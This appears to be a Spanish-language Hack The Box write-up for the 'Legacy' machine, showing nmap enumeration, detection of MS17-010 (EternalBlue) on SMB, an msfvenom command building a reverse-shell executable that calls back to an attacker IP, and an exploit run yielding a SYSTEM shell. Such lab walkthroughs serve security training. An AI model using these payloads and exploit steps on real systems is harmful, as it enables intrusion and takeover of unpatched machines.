Posts Hackthebox Legacy Writeup (OSCP Style)
Post
Cancel

Hackthebox Legacy Writeup (OSCP Style)

Posted Aug 26, 2020 2020-08-26T14:21:54-05:00 by Adrian Inkblack
Updated Aug 28, 2020 2020-08-28T13:54:37-05:00

Información de la máquina.

ContenidoDescripción
OS:
Dificultad:Facil
Puntos:20
Lanzamiento:15/Marzo/2017
IP:10.10.10.4
Primera sangre de usuario:0x1Nj3cT0R
Primera sangre de system:0x1Nj3cT0R

Enumeación.

Como siempre comenzaremos con un escaneo a los 65535 puertos para descubrir cuales son los puertos abiertos.

1
2
3
4
5
6
7
8
9
10
11

intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts legacy.htb -Pn --min-rate 3000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:13 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.23s latency).
Not shown: 65532 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds

Después lanzaré scripts de enumeración básicos para conocer los servicios y versiones de los puertos abiertos.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

intrusionz3r0@kali:~$  nmap -sCV -p139,445 -oN targeted legacy.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:16 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m21s, deviation: 2h07m16s, median: 4d23h00m21s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:91:0b (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-09-01T03:17:15+03:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.69 seconds

El escaneo determino lo siguiente:

  • Puerto 139/tcp con servicio samba.
  • Puerto 445/tcp con servicio samba.

Análisis del servicio samba.

Rápidamente lanzo otro escaneo con nmap con el objetivo de poder encontrar si estas versiones de samba esta asociadas con alguna vulnerabilidad critica.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

intrusionz3r0@kali:~$ nmap -p139,445 --script="Vuln and Safe" legacy.htb -oN vulnScan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:26 CDT
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.29s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds

¡¡Eureka!!

Podemos observar que la máquina es vulnerable a ms17-010 el famoso eternalblue.

Para explotarlo necesitamos descargarnos el siguiente repositorio: https://github.com/helviojunior/MS17-010

Explotación de eternalblue.

Una vez descargado verificamos si la máquina es vulnerable nuevamente.

1
2
3
4
5
6
7
8
9
10
11

intrusionz3r0@kali:~$ sudo python checker.py legacy.htb                                                                        [28/28]
Trying to connect to legacy.htb:445                                                                                                                                
Target OS: Windows 5.1                                                                                                                                             
The target is not patched                                                                                                                                          
                                                                                                                                                                   
=== Testing named pipes ===                                                                                                                                        
spoolss: Ok (32 bit)                                                                                                                                               
samr: STATUS_ACCESS_DENIED                                                                                                                                         
netlogon: STATUS_ACCESS_DENIED                                                                                                                                     
lsarpc: STATUS_ACCESS_DENIED                                                                                                                                       
browser: Ok (32 bit)

Si en la respuesta te arroja cualquier pipe en OK significa de que es vulnerable.

Creamos una payload.

1
2
3
4
5
6
7

intrusionz3r0@kali:~$ sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=1234 -f exe -o eternal.exe                    
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload                                                                             
[-] No arch selected, selecting arch: x86 from the payload                                                                                                         
No encoder specified, outputting raw payload                                                                                                                       
Payload size: 324 bytes                                                                                                                                            
Final size of exe file: 73802 bytes                                                                                                                                
Saved as: eternal.exe

Por último dejamos nuestro netcat a la escucha y lanzamos el exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

intrusionz3r0@kali:~$ sudo python send_and_execute.py 10.10.10.4 eternal.exe 445 spoolss                           
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82129010
SESSION: 0xe21045d8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21676b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2167750
overwriting token UserAndGroups
Sending file V9TKR5.exe...
Opening SVCManager on 10.10.10.4.....
Creating service BYjN.....
Starting service BYjN.....
The NETBIOS connection with the remote host timed out.
Removing service BYjN.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Ejecución del binario whoami.exe

¡¡Eureka!!

Tenemos shell pero al intentar ejecutar el comando whoami podemos observar que es imposible debido a que no exite el binario.

1
2
3
4

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

Aunque se que somos Administradores de todas formas vamos a intentar ejecutar el binario whoami en la máquina.

Rápidamente me levanto un servidor con samba compartiendo el whoami.exe y lo ejecutamos desde ahí.

¡¡Somos Administrador!!

enter image description here

Espero te haya gustado, recuerda seguirme en mis redes sociales para estar al pendiente de todo mi contenido.

¡Muchas Gracias!

Hackthebox, Windows
Eternalblue MS17-010
This post is licensed under CC BY 4.0 by the author.

Recent Update

Contents

Hackthebox Magic Writeup (OSCP Style)

Hackthebox Devel Writeup (OSCP Style)